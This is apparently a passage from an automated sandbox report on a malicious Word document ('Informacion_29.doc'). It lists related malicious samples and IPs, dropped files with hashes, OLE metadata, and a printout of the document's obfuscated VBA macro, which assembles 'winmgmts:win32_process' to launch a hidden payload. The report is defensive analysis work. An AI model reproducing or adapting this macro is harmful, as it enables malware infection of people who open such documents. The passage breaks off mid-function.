                                              DHL Receipt_pdf.exeGet hashmaliciousBrowse
                                              • 185.221.216.3
                                              HBL CreditCard.exeGet hashmaliciousBrowse
                                              • 185.221.216.3
                                              Invoice_pdf.exeGet hashmaliciousBrowse
                                              • 185.221.216.3
                                              Packing list_pdf.exeGet hashmaliciousBrowse
                                              • 185.221.216.3
                                              http://mail.strantake.casaGet hashmaliciousBrowse
                                              • 172.93.120.224
                                              https://siyabekezela.co.za/asTitle/1-File.htmGet hashmaliciousBrowse
                                              • 66.85.47.62
                                              SKSATECH1-MYSKSATECHNOLOGYSDNBHDMYRechnungsDetails_16_09_2020_0873352305.docGet hashmaliciousBrowse
                                              • 103.8.25.12
                                              Payment.docGet hashmaliciousBrowse
                                              • 103.8.25.12
                                              DOK.docGet hashmaliciousBrowse
                                              • 103.8.25.12
                                              dcyRvzSTPa.docGet hashmaliciousBrowse
                                              • 103.8.25.12
                                              Rech_16_09_2020.docGet hashmaliciousBrowse
                                              • 103.8.25.12
                                              JPZ-010920 PCL-160920.docGet hashmaliciousBrowse
                                              • 103.8.25.12
                                              Soumissions.docGet hashmaliciousBrowse
                                              • 103.8.25.12
                                              application.docGet hashmaliciousBrowse
                                              • 103.8.25.12
                                              430#U0437.jsGet hashmaliciousBrowse
                                              • 103.8.25.98
                                              430#U0437.jsGet hashmaliciousBrowse
                                              • 103.8.25.98
                                              https://classskincare.com/%3cGet hashmaliciousBrowse
                                              • 103.8.27.160
                                              Document.htmlGet hashmaliciousBrowse
                                              • 103.8.26.89

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4ABB8037-B28F-4AE5-86AD-026C320EA73C}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Informacion_29.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Thu Jan 7 18:46:35 2021, length=166400, window=hide
                                              Category:dropped
                                              Size (bytes):2068
                                              Entropy (8bit):4.572427491392623
                                              Encrypted:false
                                              SSDEEP:24:8l//XTwz6IknfeP32Dv3qKdM7dD2l//XTwz6IknfeP32Dv3qKdM7dV:8x/XT3IkfgdKQh2x/XT3IkfgdKQ/
                                              MD5:2C4BEE353E86A6182A6BF563C9E194C4
                                              SHA1:89218D4D65DF0BF5934D536DA28F870F240C4D98
                                              SHA-256:F01AEE2A3CD4410575B6F5CDB58CD003AE1BE075CDAECC4FB1DCBB1C3FE1382B
                                              SHA-512:7508715741C52A93AE35FA1C982AE2C145CC62438503B47E81BA651E9B850FA3502FE2AE0296FEFFBF4C0AF1D060DCD68690B86DC7D85A54A5A2664B4B3BD728
                                              Malicious:false
                                              Reputation:low
                                              Preview: L..................F.... ...K...{..K...{..3.Z.-................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....'R. .INFORM~1.DOC..R.......Q.y.Q.y*...8.....................I.n.f.o.r.m.a.c.i.o.n._.2.9...d.o.c.......|...............-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\Informacion_29.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.n.f.o.r.m.a.c.i.o.n._.2.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041..........D_....3N...W...9F.C...........[D_
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):80
                                              Entropy (8bit):4.426152982886245
                                              Encrypted:false
                                              SSDEEP:3:M13YMvXcdruYVo0LDKXYMvXcdruYVomX13YMvXcdruYVov:MJRXzYVDWXRXzYVPRXzYVy
                                              MD5:042F5F393FD36BE1B60BED04920684F5
                                              SHA1:6DCD71532B488DFF0EADC5CB44ACDDC67FE38988
                                              SHA-256:A7D21E0CE6ADF72298D68C0C4252482FFC4BD697E1219E796B6AF2DCA3725A47
                                              SHA-512:96016E41B3AC9B79B5D6314F87B21F99FA2612BAC64B79AF6055BED846FF16CA669D1548F361DDA3546A0911D226ECACF3461B5E52EC57678A2217299A89608E
                                              Malicious:false
                                              Reputation:low
                                              Preview: [doc]..Informacion_29.LNK=0..Informacion_29.LNK=0..[doc]..Informacion_29.LNK=0..
                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.431160061181642
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                              MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                              SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                              SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                              SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9B7L1L5LINF2XOUZBZSO.temp
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):8016
                                              Entropy (8bit):3.584847739577161
                                              Encrypted:false
                                              SSDEEP:96:chQCsMqftMqvsqvJCwokz8hQCsMqftMqvsEHyqvJCworqzkKYftJHPf8RAt+lUVY:cy3okz8y7Hnorqzkhf8RbIu
                                              MD5:BE362DF1966FF2BB4D114B8CBB0FF97E
                                              SHA1:4EE57BEE06306F9917C2BBF971986CB6BFDB1EFB
                                              SHA-256:C693684C8A5409A91D60C00A1875F85E6F1DBF557706EEA1F9B79E52FD54287A
                                              SHA-512:8B03AEC2FFE750E750853C90D49BCAF413DE1FCEB660B1B2BE3F85071A283E9137F8D88212A1632A9E1E2328E01577DC9BF9B2D14FEE969F137A85A78939C332
                                              Malicious:false
                                              Reputation:low
                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                              C:\Users\user\Desktop\~$formacion_29.doc
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.431160061181642
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                              MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                              SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                              SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                              SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Industrial, Tools & Health Cliffs Unbranded Soft Tuna Industrial optimal Expanded Cambridgeshire 1080p SMS Money Market Account synthesizing core, Author: Mohamed Gaillard, Template: Normal.dotm, Last Saved By: Louise Fleury, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 29 06:14:00 2020, Last Saved Time/Date: Tue Dec 29 06:15:00 2020, Number of Pages: 1, Number of Words: 2867, Number of Characters: 16346, Security: 8
                                              Entropy (8bit):6.654073649441584
                                              TrID:
                                              • Microsoft Word document (32009/1) 79.99%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                              File name:Informacion_29.doc
                                              File size:165023
                                              MD5:6c1cb4c06ead6f5ce29a931fa12410fa
                                              SHA1:4ac228fa54e73993dcccb69389a97cfcf67228b5
                                              SHA256:43dab9a4e7aaa8a0d894f6e64d73bb829dd8c40ff8161233fb6e0886b14819c3
                                              SHA512:f71192ea05b085bf7dc0add6340bee96eb5885cf1720d15b772e7b60b02f55f4004969fbff42cb2804f9c31435a1015a31ed77d4205be3535e7095e980f2142c
                                              SSDEEP:3072:LHxUDct5DEjo3tbmGBBqLrcBjVJymH4o9ufstRUUKSns8T00JSHUgteMJ8qMD7gb:LHxUDct5DEjo3tbmGBBqLrcBjVJymH4r
                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4eea2aaa4b4b4a4

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "Informacion_29.doc"

                                              Indicators

                                              Has Summary Info:True
                                              Application Name:Microsoft Office Word
                                              Encrypted Document:False
                                              Contains Word Document Stream:True
                                              Contains Workbook/Book Stream:False
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:True

                                              Summary

                                              Code Page:1252
                                              Title:
                                              Subject:Industrial, Tools & Health Cliffs Unbranded Soft Tuna Industrial optimal Expanded Cambridgeshire 1080p SMS Money Market Account synthesizing core
                                              Author:Mohamed Gaillard
                                              Keywords:
                                              Comments:
                                              Template:Normal.dotm
                                              Last Saved By:Louise Fleury
                                              Revion Number:1
                                              Total Edit Time:0
                                              Create Time:2020-12-29 06:14:00
                                              Last Saved Time:2020-12-29 06:15:00
                                              Number of Pages:1
                                              Number of Words:2867
                                              Number of Characters:16346
                                              Creating Application:Microsoft Office Word
                                              Security:8

                                              Document Summary

                                              Document Code Page:1252
                                              Number of Lines:136
                                              Number of Paragraphs:38
                                              Thumbnail Scaling Desired:False
                                              Company:
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:786432

                                              Streams with VBA

                                              VBA File Name: Jwq9b1lb0hmm7, Stream Size: 14416
                                              General
                                              Stream Path:Macros/VBA/Jwq9b1lb0hmm7
                                              VBA File Name:Jwq9b1lb0hmm7
                                              Stream Size:14416
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 fc 0a 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 03 0b 00 00 9f 29 00 00 00 00 00 00 01 00 00 00 06 12 1b 22 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              MoyUg
                                              #BrygCBI
                                              HQLYP()
                                              gNNhpjuZF:
                                              ywWmAGeG:
                                              WkbcFJEAD()
                                              Gyyqq()
                                              Access
                                              #pIXfAL
                                              Len(mKbjhqs))
                                              dNGEjAD
                                              #rxYZps,
                                              gJLEFBFsL()
                                              AeWeHOJCg
                                              tKzwqzI()
                                              Resume
                                              "O:\afdxHDJBG\OOakBB\YSVJm.JNPGbSG"
                                              tKzwqzI
                                              #MoyUg
                                              SkWVG
                                              "F:\UeqgCwFC\RxvLiOJ\RLltYG.ddhvuGkBf"
                                              RimyuHaBD:
                                              #DfnXDeC,
                                              DfnXDeC
                                              GbSOBaBqc:
                                              UfOeJ
                                              wcDKJI
                                              "F:\WnCoG\HBbVaCA\fukyDw.vGjESBX"
                                              #BIeAA,
                                              "O:\MRWMgFJ\zsKRHI\OiSxC.XZZmtH"
                                              VORRAG()
                                              kBZBQ()
                                              #DfnXDeC
                                              "O:\ZrqrOBE\FXQPgFGG\sXMnHEFDC.KjybCdXDB"
                                              ktJgD
                                              ktJgD()
                                              #dNGEjAD,
                                              #MoyUg,
                                              "O:\NSaqADG\xcZtJId\QXNwGFN.KtgHGEA"
                                              fMGbFJDRE
                                              JeDBhB()
                                              FreeFile
                                              DnGiABxzG()
                                              Gyyqq
                                              LOF(intGend)
                                              #fFPBDj,
                                              XNcuAGoGD:
                                              "O:\rrOzBX\vKCgAGJu\YNZlI.zUSFWsZF"
                                              LITXEDEBE
                                              #tSFvVJKHm
                                              JeDBhB
                                              BIeAA
                                              ZWAfIID
                                              #BrygCBI,
                                              "F:\mWSwpXAkG\PTfrgAdE\ddNtJFJ.OGZBEnFW"
                                              "O:\xaLnPmJ\onZFlHPHD\pjbxIFFyV.svJWEETFm"
                                              #vjURJ
                                              "O:\GyBLIwJ\JyRgQhPrC\cnPdi.CmtbG"
                                              "F:\AKQUADx\HTvZJNG\ezFFDE.dCWKQ"
                                              #JvVTCss
                                              ykcixJTsM:
                                              "O:\qklyMYNC\IkLXI\wrvzJw.AssIJ"
                                              ZCRUUEr
                                              #aPIAJ
                                              pIXfAL
                                              "F:\IdwCD\hmrPgFD\cRBUGEn.vHNcDFc"
                                              snahbsd
                                              NFVBCEf
                                              "O:\jobmCCM\LsFeNKGF\DLsTwJcGF.EAyuxB"
                                              ReDim
                                              "O:\YNLYhp\IlEWOXUB\zsUqqD.dEGfRCFGF"
                                              lkVoRJ
                                              BrygCBI
                                              #efPVC
                                              "O:\wYEmvKo\npTgDE\QjFhGJ.dWmjGFD"
                                              AUrNIzEG()
                                              #fFPBDj
                                              RimyuHaBD
                                              #UfOeJ,
                                              WppWDKHVA
                                              "F:\ySkIB\qKFmg\KrORs.CZcSEH"
                                              "F:\ttHCHFDz\vMPdJC\ZVyvz.VjTkH"
                                              qKxQJQE
                                              #pIXfAL,
                                              kBZBQ
                                              "O:\GVNBCFD\RBPGB\hCZaAY.voqXFB"
                                              #pGKDuEB,
                                              fMGbFJDRE:
                                              qKxQJQE:
                                              "F:\wNSIF\NalQICj\SnhzIBQCA.WlbcmBJ"
                                              DnGiABxzG
                                              VORRAG
                                              "O:\bIYmeeW\uNvuErAyD\EIuXFu.FZTwFCBPD"
                                              "F:\TtMDAecA\xaSGJIyyl\NmQTHB.LFYtzzGH"
                                              hSQRFSr
                                              Binary
                                              XNcuAGoGD
                                              COxEbv
                                              wcDKJI:
                                              "O:\BNSoFH\dvEzG\mUAiwC.yubtGH"
                                              "F:\EiaVDDCIE\RgrHGIHJ\YsPmFt.nHOaP"
                                              "F:\kFayEHAHH\ddvLIEC\CfRxAE.EiLcdX"
                                              efPVC
                                              #ksQLDZi,
                                              lOETktD:
                                              pGKDuEB
                                              "F:\SHBduI\KjeOHB\KwnyCEHCA.QsWbrdJu"
                                              #JvVTCss,
                                              Integer
                                              NFVBCEf()
                                              #WppWDKHVA,
                                              JJjHG:
                                              "F:\LFwuAJBD\MeKNHEh\XqeRErUC.bMHKAFLIh"
                                              SkWVG()
                                              RzwvkExUI()
                                              vjURJ
                                              GbSOBaBqc
                                              cgFzqJS
                                              Error
                                              #vjURJ,
                                              aPIAJ
                                              LITXEDEBE()
                                              #BIeAA
                                              ywWmAGeG
                                              gNNhpjuZF
                                              RzwvkExUI
                                              "F:\CmMyA\WnqICJj\RxyolAqJ.nRDeH"
                                              ZCRUUEr:
                                              Attribute
                                              ykcixJTsM
                                              #WppWDKHVA
                                              AeWeHOJCg:
                                              Mid(mKbjhqs,
                                              hSQRFSr:
                                              lOETktD
                                              #lkVoRJ
                                              #rxYZps
                                              Close
                                              "O:\WQqDe\KszDkOWIC\ttjarADJ.HmKSFGCfE"
                                              rxYZps
                                              nOveD
                                              nOveD()
                                              "F:\jfmsCJLQ\OVuohC\iqVBCCBoF.pAzGmA"
                                              VB_Name
                                              fFPBDj
                                              uUxhxDE:
                                              "F:\DMRGvDLCX\DXrWE\kOeDmD.yjIGHMCl"
                                              cgFzqJS:
                                              JJjHG
                                              sYcQrq()
                                              Function
                                              #tSFvVJKHm,
                                              #UfOeJ
                                              #pGKDuEB
                                              #dNGEjAD
                                              COxEbv()
                                              VSbuEj:
                                              #ksQLDZi
                                              sYcQrq
                                              HQLYP
                                              ksQLDZi
                                              #lkVoRJ,
                                              JvVTCss
                                              "F:\WVuZGJAu\ksDKBbCz\XkJlEj.CrnAcG"
                                              #efPVC,
                                              ZWAfIID:
                                              gJLEFBFsL
                                              "O:\BccaMZ\jTkNfIWH\wtXBIkAZ.sSCvDComF"
                                              WkbcFJEAD
                                              mKbjhqs
                                              VSbuEj
                                              AUrNIzEG
                                              "F:\VqVSEFdE\MWGOECeCF\PfclaI.OeGfCLIU"
                                              uUxhxDE
                                              "O:\hLrrUIYmJ\REMOCDBjE\WEMaHYGD.fCCwYV"
                                              "O:\zwfmA\FZQAOA\MnHvGI.RIeDASf"
                                              #aPIAJ,
                                              tSFvVJKHm
                                              VBA Code
                                              Attribute VB_Name = "Jwq9b1lb0hmm7"
                                              Function Nr8et74sjtle6s()
                                              On Error Resume Next
                                              mKbjhqs = Ouz_y28f7ehnqn.StoryRanges.Item(244 / 244)
                                                 GoTo ywWmAGeG
                                              Dim VORRAG() As Byte
                                              Dim DfnXDeC As Integer
                                              DfnXDeC = FreeFile
                                              Open "F:\VqVSEFdE\MWGOECeCF\PfclaI.OeGfCLIU" For Binary Access Read As #DfnXDeC
                                              Open "O:\WQqDe\KszDkOWIC\ttjarADJ.HmKSFGCfE" For Binary Access Read As #DfnXDeC
                                              ReDim VORRAG(1 To LOF(intGend) - 5)
                                              Get #DfnXDeC, , VORRAG
                                              Get #DfnXDeC, , VORRAG
                                              Get #DfnXDeC, , VORRAG
                                              Close #DfnXDeC
                                              ywWmAGeG:
                                              snahbsd = "]b2[sp]b2[s"
                                              Umvc8xcohh1q3zu0kx = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
                                                 GoTo gNNhpjuZF
                                              Dim JeDBhB() As Byte
                                              Dim efPVC As Integer
                                              efPVC = FreeFile
                                              Open "F:\jfmsCJLQ\OVuohC\iqVBCCBoF.pAzGmA" For Binary Access Read As #efPVC
                                              Open "O:\ZrqrOBE\FXQPgFGG\sXMnHEFDC.KjybCdXDB" For Binary Access Read As #efPVC
                                              ReDim JeDBhB(1 To LOF(intGend) - 5)
                                              Get #efPVC, , JeDBhB
                                              Get #efPVC, , JeDBhB
                                              Get #efPVC, , JeDBhB
                                              Close #efPVC
                                              gNNhpjuZF:
                                              Ay7bggewedd3phn5 = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
                                                 GoTo ZCRUUEr
                                              Dim COxEbv() As Byte
                                              Dim pIXfAL As Integer
                                              pIXfAL = FreeFile
                                              Open "F:\wNSIF\NalQICj\SnhzIBQCA.WlbcmBJ" For Binary Access Read As #pIXfAL
                                              Open "O:\NSaqADG\xcZtJId\QXNwGFN.KtgHGEA" For Binary Access Read As #pIXfAL
                                              ReDim COxEbv(1 To LOF(intGend) - 5)
                                              Get #pIXfAL, , COxEbv
                                              Get #pIXfAL, , COxEbv
                                              Get #pIXfAL, , COxEbv
                                              Close #pIXfAL
                                              ZCRUUEr:
                                              Imytpzb0s5n = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
                                                 GoTo XNcuAGoGD
                                              Dim NFVBCEf() As Byte
                                              Dim MoyUg As Integer
                                              MoyUg = FreeFile
                                              Open "F:\DMRGvDLCX\DXrWE\kOeDmD.yjIGHMCl" For Binary Access Read As #MoyUg
                                              Open "O:\zwfmA\FZQAOA\MnHvGI.RIeDASf" For Binary Access Read As #MoyUg
                                              ReDim NFVBCEf(1 To LOF(intGend) - 5)
                                              Get #MoyUg, , NFVBCEf
                                              Get #MoyUg, , NFVBCEf
                                              Get #MoyUg, , NFVBCEf
                                              Close #MoyUg
                                              XNcuAGoGD:
                                              B5vh4w9yggemggw4dw = "]b2[ss]b2[s"
                                                 GoTo AeWeHOJCg
                                              Dim kBZBQ() As Byte
                                              Dim dNGEjAD As Integer
                                              dNGEjAD = FreeFile
                                              Open "F:\AKQUADx\HTvZJNG\ezFFDE.dCWKQ" For Binary Access Read As #dNGEjAD
                                              Open "O:\wYEmvKo\npTgDE\QjFhGJ.dWmjGFD" For Binary Access Read As #dNGEjAD
                                              ReDim kBZBQ(1 To LOF(intGend) - 5)
                                              Get #dNGEjAD, , kBZBQ
                                              Get #dNGEjAD, , kBZBQ
                                              Get #dNGEjAD, , kBZBQ
                                              Close #dNGEjAD
                                              AeWeHOJCg:
                                              U5bklmbs296g6nu09w = Imytpzb0s5n + B5vh4w9yggemggw4dw + Ay7bggewedd3phn5 + snahbsd + Umvc8xcohh1q3zu0kx
                                                 GoTo GbSOBaBqc
                                              Dim HQLYP() As Byte
                                              Dim vjURJ As Integer
                                              vjURJ = FreeFile
                                              Open "F:\ySkIB\qKFmg\KrORs.CZcSEH" For Binary Access Read As #vjURJ
                                              Open "O:\rrOzBX\vKCgAGJu\YNZlI.zUSFWsZF" For Binary Access Read As #vjURJ
                                              ReDim HQLYP(1 To LOF(intGend) - 5)
                                              Get #vjURJ, , HQLYP
                                              Get #vjURJ, , HQLYP
                                              Get #vjURJ, , HQLYP
                                              Close #vjURJ
                                              GbSOBaBqc:
                                              Jf4lj98w22pm0 = Tfizx5uxnfjbxnml(U5bklmbs296g6nu09w)
                                                 GoTo ykcixJTsM
                                              Dim DnGiABxzG() As Byte
                                              Dim pGKDuEB As Integer
                                              pGKDuEB = FreeFile
                                              Open "F:\EiaVDDCIE\RgrHGIHJ\YsPmFt.nHOaP" For Binary Access Read As #pGKDuEB
                                              Open "O:\YNLYhp\IlEWOXUB\zsUqqD.dEGfRCFGF" For Binary Access Read As #pGKDuEB
                                              ReDim DnGiABxzG(1 To LOF(intGend) - 5)
                                              Get #pGKDuEB, , DnGiABxzG
                                              Get #pGKDuEB, , DnGiABxzG
                                              Get #pGKDuEB, , DnGiABxzG
                                              Close #pGKDuEB
                                              ykcixJTsM:
                                              Set Wvxrpert99ob1x = CreateObject(Jf4lj98w22pm0)
                                                 GoTo uUxhxDE
                                              Dim AUrNIzEG() As Byte
                                              Dim lkVoRJ As Integer
                                              lkVoRJ = FreeFile
                                              Open "F:\WVuZGJAu\ksDKBbCz\XkJlEj.CrnAcG" For Binary Access Read As #lkVoRJ
                                              Open "O:\BNSoFH\dvEzG\mUAiwC.yubtGH" For Binary Access Read As #lkVoRJ
                                              ReDim AUrNIzEG(1 To LOF(intGend) - 5)
                                              Get #lkVoRJ, , AUrNIzEG
                                              Get #lkVoRJ, , AUrNIzEG
                                              Get #lkVoRJ, , AUrNIzEG
                                              Close #lkVoRJ
                                              uUxhxDE:
                                              Ysqw359hi8dilh_ = Mid(mKbjhqs, (2 + 3), Len(mKbjhqs))
                                                 GoTo qKxQJQE
                                              Dim LITXEDEBE() As Byte
                                              Dim JvVTCss As Integer
                                              JvVTCss = FreeFile
                                              Open "F:\LFwuAJBD\MeKNHEh\XqeRErUC.bMHKAFLIh" For Binary Access Read As #JvVTCss
                                              Open "O:\GVNBCFD\RBPGB\hCZaAY.voqXFB" For Binary Access Read As #JvVTCss
                                              ReDim LITXEDEBE(1 To LOF(intGend) - 5)
                                              Get #JvVTCss, , LITXEDEBE
                                              Get #JvVTCss, , LITXEDEBE
                                              Get #JvVTCss, , LITXEDEBE
                                              Close #JvVTCss
                                              qKxQJQE:
                                                 GoTo ZWAfIID
                                              Dim sYcQrq() As Byte
                                              Dim aPIAJ As Integer
                                              aPIAJ = FreeFile
                                              Open "F:\mWSwpXAkG\PTfrgAdE\ddNtJFJ.OGZBEnFW" For Binary Access Read As #aPIAJ
                                              Open "O:\MRWMgFJ\zsKRHI\OiSxC.XZZmtH" For Binary Access Read As #aPIAJ
                                              ReDim sYcQrq(1 To LOF(intGend) - 5)
                                              Get #aPIAJ, , sYcQrq
                                              Get #aPIAJ, , sYcQrq
                                              Get #aPIAJ, , sYcQrq
                                              Close #aPIAJ
                                              ZWAfIID:
                                              Wvxrpert99ob1x.Create Tfizx5uxnfjbxnml(Ysqw359hi8dilh_), Il6ap8xlb73, C1lvz_08ro0vrbmv6
                                                 GoTo cgFzqJS
                                              Dim ktJgD() As Byte
                                              Dim rxYZps As Integer
                                              rxYZps = FreeFile
                                              Open "F:\CmMyA\WnqICJj\RxyolAqJ.nRDeH" For Binary Access Read As #rxYZps
                                              Open "O:\bIYmeeW\uNvuErAyD\EIuXFu.FZTwFCBPD" For Binary Access Read As #rxYZps
                                              ReDim ktJgD(1 To LOF(intGend) - 5)
                                              Get #rxYZps, , ktJgD
                                              Get #rxYZps, , ktJgD
                                              Get #rxYZps, , ktJgD
                                              Close #rxYZps
                                              cgFzqJS:
                                                 GoTo fMGbFJDRE
                                              Dim Gyyqq() As Byte
                                              Dim UfOeJ As Integer
                                              UfOeJ = FreeFile
                                              Open "F:\ttHCHFDz\vMPdJC\ZVyvz.VjTkH" For Binary Access Read As #UfOeJ
                                              Open "O:\BccaMZ\jTkNfIWH\wtXBIkAZ.sSCvDComF" For Binary Access Read As #UfOeJ
                                              ReDim Gyyqq(1 To LOF(intGend) - 5)
                                              Get #UfOeJ, , Gyyqq
                                              Get #UfOeJ, , Gyyqq
                                              Get #UfOeJ, , Gyyqq
                                              Close #UfOeJ
                                              fMGbFJDRE:
                                              End Function
                                              Function Tfizx5uxnfjbxnml(Vxdy838fy4c1xspht)
                                              On Error Resume Next
                                                 GoTo wcDKJI
                                              Dim tKzwqzI() As Byte
                                              Dim BrygCBI As Integer
                                              BrygCBI = FreeFile
                                              Open "F:\SHBduI\KjeOHB\KwnyCEHCA.QsWbrdJu" For Binary Access Read As #BrygCBI
                                              Open "O:\GyBLIwJ\JyRgQhPrC\cnPdi.CmtbG" For Binary Access Read As #BrygCBI
                                              ReDim tKzwqzI(1 To LOF(intGend) - 5)
                                              Get #BrygCBI, , tKzwqzI
                                              Get #BrygCBI, , tKzwqzI
                                              Get #BrygCBI, , tKzwqzI
                                              Close #BrygCBI
                                              wcDKJI:
                                              Tt79y87d36ripg03s = (Vxdy838fy4c1xspht)
                                                 GoTo lOETktD
                                              Dim gJLEFBFsL() As Byte
                                              Dim BIeAA As Integer
                                              BIeAA = FreeFile
                                              Open "F:\UeqgCwFC\RxvLiOJ\RLltYG.ddhvuGkBf" For Binary Access Read As #BIeAA
